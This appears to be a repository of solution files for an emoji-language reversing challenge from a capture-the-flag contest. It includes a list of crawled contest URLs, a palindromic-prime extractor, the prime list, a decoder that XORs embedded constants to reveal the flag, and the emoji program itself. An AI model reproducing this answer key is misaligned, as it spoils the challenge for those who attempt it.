129 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "img": "
", "images": []},
130 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "img": "
", "images": []},
131 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "img": "
", "images": []},
132 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "img": "
", "images": []},
133 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "img": "
", "images": []},
134 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "img": "
", "images": []},
135 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "img": "
", "images": []},
136 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "img": "
", "images": []},
137 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "img": "
", "images": []},
138 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "img": "
", "images": []},
139 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "img": "
", "images": []},
140 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "img": "
", "images": []},
141 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "img": "
", "images": []},
142 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "img": "
", "images": []},
143 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "img": "
", "images": []},
144 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "img": "
", "images": []},
145 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "img": "
", "images": []},
146 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "img": "
", "images": []},
147 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "img": "
", "images": []},
148 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1dec2ca01d4483533348b872bff74c6f.html", "img": "
", "images": []},
149 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "img": "
", "images": []},
150 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "img": "
", "images": []},
151 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "img": "
", "images": []},
152 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "img": "
", "images": []},
153 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/75f4f167ff1f7420bbc1cd9e3cd582f9.html", "img": "
", "images": []},
154 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "img": "
", "images": []},
155 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cb6a01e6c7b12a34da7e15a1929a759b.html", "img": "
", "images": []},
156 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "img": "
", "images": []},
157 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "img": "
", "images": []},
158 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "img": "
", "images": []},
159 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "img": "
", "images": []},
160 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "img": "
", "images": []},
161 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "img": "
", "images": []},
162 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "img": "
", "images": []},
163 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "img": "
", "images": []},
164 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "img": "
", "images": []},
165 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "img": "
", "images": []},
166 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/835d04820fb39bafd50547f6859f4729.html", "img": "
", "images": []},
167 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/2c1ff627fad3ccf58988458183d04207.html", "img": "
", "images": []},
168 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/647ac82477b912a3b93c751111202ecf.html", "img": "
", "images": []},
169 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "img": "
", "images": []},
170 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5dbbfb29d8308ee367eac88d25c2b1d4.html", "img": "
", "images": []}
171 | ]
--------------------------------------------------------------------------------
/07-reversing-emoji/ctf_crawl/scrapy.cfg:
--------------------------------------------------------------------------------
1 | # Automatically created by: scrapy startproject
2 | #
3 | # For more information about the [deploy] section see:
4 | # https://scrapyd.readthedocs.io/en/latest/deploy.html
5 |
6 | [settings]
7 | default = ctf_crawl.settings
8 |
9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = ctf_crawl
12 |
--------------------------------------------------------------------------------
/07-reversing-emoji/extract-palindroms.py:
--------------------------------------------------------------------------------
# Primes lists downloaded from https://primes.utm.edu/lists/small/millions/

def is_palindrome(s):
    """Return True if the string reads the same forwards and backwards."""
    return s == s[::-1]

filenames = ['primes1.txt', 'primes2.txt', 'primes3.txt', 'primes4.txt', 'primes5.txt', 'primes6.txt']

palindromes = []
for filename in filenames:
    with open(filename, 'r') as f:
        # split() drops all whitespace, so each token is a bare word or number
        tokens = f.read().split()

    # Keep only numeric tokens (this skips the header text) that are palindromes
    p = [int(n) for n in tokens if n.isdigit() and is_palindrome(n)]
    palindromes.extend(p)

    # Per-file count
    print("found {} palindromes".format(len(p)))

# Write every palindromic prime found, comma-separated, for palindromes.py
with open('palindromes', 'w') as f:
    f.write(','.join(map(str, palindromes)))
--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes:
--------------------------------------------------------------------------------
1 | 2,3,5,7,11,101,131,151,181,191,313,353,373,383,727,757,787,797,919,929,10301,10501,10601,11311,11411,12421,12721,12821,13331,13831,13931,14341,14741,15451,15551,16061,16361,16561,16661,17471,17971,18181,18481,19391,19891,19991,30103,30203,30403,30703,30803,31013,31513,32323,32423,33533,34543,34843,35053,35153,35353,35753,36263,36563,37273,37573,38083,38183,38783,39293,70207,70507,70607,71317,71917,72227,72727,73037,73237,73637,74047,74747,75557,76367,76667,77377,77477,77977,78487,78787,78887,79397,79697,79997,90709,91019,93139,93239,93739,94049,94349,94649,94849,94949,95959,96269,96469,96769,97379,97579,97879,98389,98689,1003001,1008001,1022201,1028201,1035301,1043401,1055501,1062601,1065601,1074701,1082801,1085801,1092901,1093901,1114111,1117111,1120211,1123211,1126211,1129211,1134311,1145411,1150511,1153511,1160611,1163611,1175711,1177711,1178711,1180811,1183811,1186811,1190911,1193911,1196911,1201021,1208021,1212121,1215121,1218121,1221221,1235321,1242421,1243421,1245421,1250521,1253521,1257521,1262621,1268621,1273721,1276721,1278721,1280821,1281821,1286821,1287821,1300031,1303031,1311131,1317131,1327231,1328231,1333331,1335331,1338331,1343431,1360631,1362631,1363631,1371731,1374731,1390931,1407041,1409041,1411141,1412141,1422241,1437341,1444441,1447441,1452541,1456541,1461641,1463641,1464641,1469641,1486841,1489841,1490941,1496941,1508051,1513151,1520251,1532351,1535351,1542451,1548451,1550551,1551551,1556551,1557551,1565651,1572751,1579751,1580851,1583851,1589851,1594951,1597951,1598951,1600061,1609061,1611161,1616161,1628261,1630361,1633361,1640461,1643461,1646461,1654561,1657561,1658561,1660661,1670761,1684861,1685861,1688861,1695961,1703071,1707071,1712171,1714171,1730371,1734371,1737371,1748471,1755571,1761671,1764671,1777771,1793971,1802081,1805081,1820281,1823281,1824281,1826281,1829281,1831381,1832381,1842481,1851581,1853581,1856581,1865681,1876781,1878781,1879781,1880881,1881881,1883881,1884881,1895981,1903091,1908091,1909091,1917191,1924291,1930391
,1936391,1941491,1951591,1952591,1957591,1958591,1963691,1968691,1969691,1970791,1976791,1981891,1982891,1984891,1987891,1988891,1993991,1995991,1998991,3001003,3002003,3007003,3016103,3026203,3064603,3065603,3072703,3073703,3075703,3083803,3089803,3091903,3095903,3103013,3106013,3127213,3135313,3140413,3155513,3158513,3160613,3166613,3181813,3187813,3193913,3196913,3198913,3211123,3212123,3218123,3222223,3223223,3228223,3233323,3236323,3241423,3245423,3252523,3256523,3258523,3260623,3267623,3272723,3283823,3285823,3286823,3288823,3291923,3293923,3304033,3305033,3307033,3310133,3315133,3319133,3321233,3329233,3331333,3337333,3343433,3353533,3362633,3364633,3365633,3368633,3380833,3391933,3392933,3400043,3411143,3417143,3424243,3425243,3427243,3439343,3441443,3443443,3444443,3447443,3449443,3452543,3460643,3466643,3470743,3479743,3485843,3487843,3503053,3515153,3517153,3528253,3541453,3553553,3558553,3563653,3569653,3586853,3589853,3590953,3591953,3594953,3601063,3607063,3618163,3621263,3627263,3635363,3643463,3646463,3670763,3673763,3680863,3689863,3698963,3708073,3709073,3716173,3717173,3721273,3722273,3728273,3732373,3743473,3746473,3762673,3763673,3765673,3768673,3769673,3773773,3774773,3781873,3784873,3792973,3793973,3799973,3804083,3806083,3812183,3814183,3826283,3829283,3836383,3842483,3853583,3858583,3863683,3864683,3867683,3869683,3871783,3878783,3893983,3899983,3913193,3916193,3918193,3924293,3927293,3931393,3938393,3942493,3946493,3948493,3964693,3970793,3983893,3991993,3994993,3997993,3998993,7014107,7035307,7036307,7041407,7046407,7057507,7065607,7069607,7073707,7079707,7082807,7084807,7087807,7093907,7096907,7100017,7114117,7115117,7118117,7129217,7134317,7136317,7141417,7145417,7155517,7156517,7158517,7159517,7177717,7190917,7194917,7215127,7226227,7246427,7249427,7250527,7256527,7257527,7261627,7267627,7276727,7278727,7291927,7300037,7302037,7310137,7314137,7324237,7327237,7347437,7352537,7354537,7362637,7365637,7381837,7388837,7392937,7401047,7403047
,7409047,7415147,7434347,7436347,7439347,7452547,7461647,7466647,7472747,7475747,7485847,7486847,7489847,7493947,7507057,7508057,7518157,7519157,7521257,7527257,7540457,7562657,7564657,7576757,7586857,7592957,7594957,7600067,7611167,7619167,7622267,7630367,7632367,7644467,7654567,7662667,7665667,7666667,7668667,7669667,7674767,7681867,7690967,7693967,7696967,7715177,7718177,7722277,7729277,7733377,7742477,7747477,7750577,7758577,7764677,7772777,7774777,7778777,7782877,7783877,7791977,7794977,7807087,7819187,7820287,7821287,7831387,7832387,7838387,7843487,7850587,7856587,7865687,7867687,7868687,7873787,7884887,7891987,7897987,7913197,7916197,7930397,7933397,7935397,7938397,7941497,7943497,7949497,7957597,7958597,7960697,7977797,7984897,7985897,7987897,7996997,9002009,9015109,9024209,9037309,9042409,9043409,9045409,9046409,9049409,9067609,9073709,9076709,9078709,9091909,9095909,9103019,9109019,9110119,9127219,9128219,9136319,9149419,9169619,9173719,9174719,9179719,9185819,9196919,9199919,9200029,9209029,9212129,9217129,9222229,9223229,9230329,9231329,9255529,9269629,9271729,9277729,9280829,9286829,9289829,9318139,9320239,9324239,9329239,9332339,9338339,9351539,9357539,9375739,9384839,9397939,9400049,9414149,9419149,9433349,9439349,9440449,9446449,9451549,9470749,9477749,9492949,9493949,9495949,9504059,9514159,9526259,9529259,9547459,9556559,9558559,9561659,9577759,9583859,9585859,9586859,9601069,9602069,9604069,9610169,9620269,9624269,9626269,9632369,9634369,9645469,9650569,9657569,9670769,9686869,9700079,9709079,9711179,9714179,9724279,9727279,9732379,9733379,9743479,9749479,9752579,9754579,9758579,9762679,9770779,9776779,9779779,9781879,9782879,9787879,9788879,9795979,9801089,9807089,9809089,9817189,9818189,9820289,9822289,9836389,9837389,9845489,9852589,9871789,9888889,9889889,9896989,9902099,9907099,9908099,9916199,9918199,9919199,9921299,9923299,9926299,9927299,9931399,9932399,9935399,9938399,9957599,9965699,9978799,9980899,9981899,9989899,100030001,100050001,100
060001,100111001,100131001,100161001,100404001,100656001,100707001,100767001,100888001,100999001,101030101,101060101,101141101,101171101,101282101,101292101,101343101,101373101,101414101,101424101,101474101,101595101,101616101,101717101,101777101,101838101,101898101,101919101,101949101,101999101,102040201,102070201,102202201,102232201,102272201,102343201,102383201,102454201,102484201,102515201,102676201,102686201,102707201,102808201,102838201,103000301,103060301,103161301,103212301,103282301,103303301,103323301,103333301,103363301,103464301,103515301,103575301,103696301,103777301,103818301,103828301,103909301,103939301,104000401,104030401,104040401,104111401,104222401,104282401,104333401
--------------------------------------------------------------------------------
/07-reversing-emoji/palindromes.py:
--------------------------------------------------------------------------------
import sys

# Values from the three push blocks of `program`, listed in the order they
# come off the stack (the reverse of the order in which they are pushed).
first = [106,119,113,119,49,74,172,242,216,208,339,264,344,267,743,660,893,892,1007,975,10319,10550,10503,11342,11504,12533,12741,12833,13437,13926,13893,14450,14832,15417,15505,16094,16285,16599,16758,17488]

second = [93766,93969,94440,94669,94952,94865,95934,96354,96443,96815,97280,97604,97850,98426]

third = [9916239,9918082,9919154,9921394,9923213,9926376,9927388,9931494,9932289,9935427,9938304,9957564,9965794,9978842,9980815,9981858,9989997,100030045,100049982,100059926,100111100,100131019,100160922,100404094,100656111,100707036,100767085,100887990,100998966,101030055,101060206,101141058]


# Palindromic primes written by extract-palindroms.py, comma-separated
with open('palindromes', 'r') as f:
    palindromes = list(map(int, f.read().split(',')))

# Each block is XORed with consecutive palindromic primes. The 0-based offsets
# 0, 98 and 764 correspond to the values 1, 99 and 765 that appear in `program`
# just before each block's loop.
for i in range(len(first)):
    sys.stdout.write(chr(first[i] ^ palindromes[i]))

for i in range(len(second)):
    sys.stdout.write(chr(second[i] ^ palindromes[i + 98]))

for i in range(len(third)):
    sys.stdout.write(chr(third[i] ^ palindromes[i + 764]))
--------------------------------------------------------------------------------
/07-reversing-emoji/program:
--------------------------------------------------------------------------------
1 | 🚛 🥇 0️⃣ ✋ 📥 🥇
2 | 🚛 🥇 1️⃣ 7️⃣ 4️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
3 | 🚛 🥇 1️⃣ 6️⃣ 7️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
4 | 🚛 🥇 1️⃣ 6️⃣ 5️⃣ 9️⃣ 9️⃣ ✋ 📥 🥇
5 | 🚛 🥇 1️⃣ 6️⃣ 2️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
6 | 🚛 🥇 1️⃣ 6️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
7 | 🚛 🥇 1️⃣ 5️⃣ 5️⃣ 0️⃣ 5️⃣ ✋ 📥 🥇
8 | 🚛 🥇 1️⃣ 5️⃣ 4️⃣ 1️⃣ 7️⃣ ✋ 📥 🥇
9 | 🚛 🥇 1️⃣ 4️⃣ 8️⃣ 3️⃣ 2️⃣ ✋ 📥 🥇
10 | 🚛 🥇 1️⃣ 4️⃣ 4️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
11 | 🚛 🥇 1️⃣ 3️⃣ 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
12 | 🚛 🥇 1️⃣ 3️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
13 | 🚛 🥇 1️⃣ 3️⃣ 4️⃣ 3️⃣ 7️⃣ ✋ 📥 🥇
14 | 🚛 🥇 1️⃣ 2️⃣ 8️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
15 | 🚛 🥇 1️⃣ 2️⃣ 7️⃣ 4️⃣ 1️⃣ ✋ 📥 🥇
16 | 🚛 🥇 1️⃣ 2️⃣ 5️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
17 | 🚛 🥇 1️⃣ 1️⃣ 5️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
18 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
19 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 0️⃣ 3️⃣ ✋ 📥 🥇
20 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
21 | 🚛 🥇 1️⃣ 0️⃣ 3️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
22 | 🚛 🥇 9️⃣ 7️⃣ 5️⃣ ✋ 📥 🥇
23 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ ✋ 📥 🥇
24 | 🚛 🥇 8️⃣ 9️⃣ 2️⃣ ✋ 📥 🥇
25 | 🚛 🥇 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
26 | 🚛 🥇 6️⃣ 6️⃣ 0️⃣ ✋ 📥 🥇
27 | 🚛 🥇 7️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
28 | 🚛 🥇 2️⃣ 6️⃣ 7️⃣ ✋ 📥 🥇
29 | 🚛 🥇 3️⃣ 4️⃣ 4️⃣ ✋ 📥 🥇
30 | 🚛 🥇 2️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
31 | 🚛 🥇 3️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
32 | 🚛 🥇 2️⃣ 0️⃣ 8️⃣ ✋ 📥 🥇
33 | 🚛 🥇 2️⃣ 1️⃣ 6️⃣ ✋ 📥 🥇
34 | 🚛 🥇 2️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
35 | 🚛 🥇 1️⃣ 7️⃣ 2️⃣ ✋ 📥 🥇
36 | 🚛 🥇 7️⃣ 4️⃣ ✋ 📥 🥇
37 | 🚛 🥇 4️⃣ 9️⃣ ✋ 📥 🥇
38 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
39 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
40 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
41 | 🚛 🥇 1️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
42 | 🚛 🥈 1️⃣ ✋
43 |
44 | 🖋💠🔶🎌🚩🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 3️⃣ 8️⃣ 9️⃣ ✋
45 | 📥 🥇 📥 🥈
46 | 🏀 💰🏁🚩🎌💠🔶
47 | 🌓 🎤
48 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
49 | 😄 🏀 💰💠🔶🎌🚩🏁 😐
50 |
51 | 🚛 🥇 9️⃣ 8️⃣ 4️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
52 | 🚛 🥇 9️⃣ 7️⃣ 8️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
53 | 🚛 🥇 9️⃣ 7️⃣ 6️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
54 | 🚛 🥇 9️⃣ 7️⃣ 2️⃣ 8️⃣ 0️⃣ ✋ 📥 🥇
55 | 🚛 🥇 9️⃣ 6️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
56 | 🚛 🥇 9️⃣ 6️⃣ 4️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
57 | 🚛 🥇 9️⃣ 6️⃣ 3️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
58 | 🚛 🥇 9️⃣ 5️⃣ 9️⃣ 3️⃣ 4️⃣ ✋ 📥 🥇
59 | 🚛 🥇 9️⃣ 4️⃣ 8️⃣ 6️⃣ 5️⃣ ✋ 📥 🥇
60 | 🚛 🥇 9️⃣ 4️⃣ 9️⃣ 5️⃣ 2️⃣ ✋ 📥 🥇
61 | 🚛 🥇 9️⃣ 4️⃣ 6️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
62 | 🚛 🥇 9️⃣ 4️⃣ 4️⃣ 4️⃣ 0️⃣ ✋ 📥 🥇
63 | 🚛 🥇 9️⃣ 3️⃣ 9️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
64 | 🚛 🥇 9️⃣ 3️⃣ 7️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
65 | 🚛 🥈 9️⃣ 9️⃣ ✋
66 |
67 | 🖋💠🏁🎌🔶🚩 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 5️⃣ 6️⃣ 8️⃣ ✋
68 | 📥 🥇 📥 🥈
69 | 🏀 💰🏁🚩🎌💠🔶
70 | 🌓 🎤
71 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
72 | 😄 🏀 💰💠🏁🎌🔶🚩 😐
73 |
74 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
75 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 6️⃣ 0️⃣ 2️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
76 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 5️⃣ 5️⃣ ✋ 📥 🥇
77 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 9️⃣ 9️⃣ 8️⃣ 9️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
78 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 8️⃣ 8️⃣ 7️⃣ 9️⃣ 9️⃣ 0️⃣ ✋ 📥 🥇
79 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 6️⃣ 7️⃣ 0️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
80 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 0️⃣ 7️⃣ 0️⃣ 3️⃣ 6️⃣ ✋ 📥 🥇
81 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 6️⃣ 5️⃣ 6️⃣ 1️⃣ 1️⃣ 1️⃣ ✋ 📥 🥇
82 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 4️⃣ 0️⃣ 4️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
83 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 6️⃣ 0️⃣ 9️⃣ 2️⃣ 2️⃣ ✋ 📥 🥇
84 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 3️⃣ 1️⃣ 0️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
85 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 1️⃣ 1️⃣ 1️⃣ 0️⃣ 0️⃣ ✋ 📥 🥇
86 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 5️⃣ 9️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
87 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 4️⃣ 9️⃣ 9️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
88 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 4️⃣ 5️⃣ ✋ 📥 🥇
89 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 9️⃣ 9️⃣ 9️⃣ 7️⃣ ✋ 📥 🥇
90 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 1️⃣ 8️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
91 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 0️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
92 | 🚛 🥇 9️⃣ 9️⃣ 7️⃣ 8️⃣ 8️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
93 | 🚛 🥇 9️⃣ 9️⃣ 6️⃣ 5️⃣ 7️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
94 | 🚛 🥇 9️⃣ 9️⃣ 5️⃣ 7️⃣ 5️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
95 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 8️⃣ 3️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
96 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 5️⃣ 4️⃣ 2️⃣ 7️⃣ ✋ 📥 🥇
97 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 2️⃣ 2️⃣ 8️⃣ 9️⃣ ✋ 📥 🥇
98 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 1️⃣ 4️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
99 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 7️⃣ 3️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
100 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 6️⃣ 3️⃣ 7️⃣ 6️⃣ ✋ 📥 🥇
101 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 3️⃣ 2️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
102 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 1️⃣ 3️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
103 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 9️⃣ 1️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
104 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 8️⃣ 0️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
105 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 6️⃣ 2️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
106 | 🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋
107 |
108 | 🖋🚩💠🎌🔶🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 1️⃣ 0️⃣ 2️⃣ 3️⃣ ✋
109 | 📥 🥇 📥 🥈
110 | 🏀 💰🏁🚩🎌💠🔶
111 | 🌓 🎤
112 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
113 | 😄 🏀 💰🚩💠🎌🔶🏁 😐
114 | ⌛
115 |
116 | 🖋🏁🚩🎌💠🔶
117 | 🚛 🥇 2️⃣ ✋ 📥 🥇 🖋💠🎌🏁🚩🔶
118 | 🏀 💰🚩🔶🏁🎌💠
119 | 🖋🔶🎌🚩💠🏁 😲 📤 🏀 💰🔶🚩💠🏁🎌 ✋ 😐
120 | 📤 🏀 💰🎌🏁💠🔶🚩
121 | 🖋🎌🏁🚩🔶💠 😲 📤 🏀 💰🔶🚩💠🏁🎌 😐
122 | 📤 🍿 🥇 🚛 🥈 1️⃣ ✋ 📥 🥈 🔪
123 | 😲 📤 🍿 🥈 📥 🥇 📥 🥈 ⛰ 😐 📥 🥇
124 | 🖋🔶🚩💠🏁🎌 🚛 🥈 1️⃣ ✋ 📥 🥈 🍡 🏀 💰💠🎌🏁🚩🔶
125 |
126 | 🖋🚩🔶🏁🎌💠
127 | 🤡 🚛 🥇 2️⃣ ✋ 📥 🥇
128 | 🖋🎌🚩💠🔶🏁 🔪 😲 📤 🚛 🥇 1️⃣ ✋ 📥 🥇
129 | 🏀 💰🔶🎌🚩💠🏁 😐
130 | 📤 🤡 📥 🥇
131 | 📬 😲 🏀 💰🔶🎌🚩💠🏁 😐
132 | 📤 🤡 📥 🥇 🚛 🥇 1️⃣ ✋
133 | 📥 🥇 🍡 🤡 🍿 🥇 🏀 💰🎌🚩💠🔶🏁
134 |
135 | 🖋🎌🏁💠🔶🚩
136 | 🤡 🤡 🚛 🥈 0️⃣ ✋ 📥 🥈
137 | 🖋🏁💠🔶🚩🎌 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇
138 | ⭐ 🍿 🥈 📥 🥇 📬
139 | 📥 🥈 🍡 🍿 🥈 🍿 🥇 🤡 📥 🥈 🔪
140 | 😲 📤 🚛 🥈 1️⃣ ✋ 📥 🥈 🏀 💰🎌🏁🚩🔶💠 😐
141 | 📤 📥 🥇 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇 📐
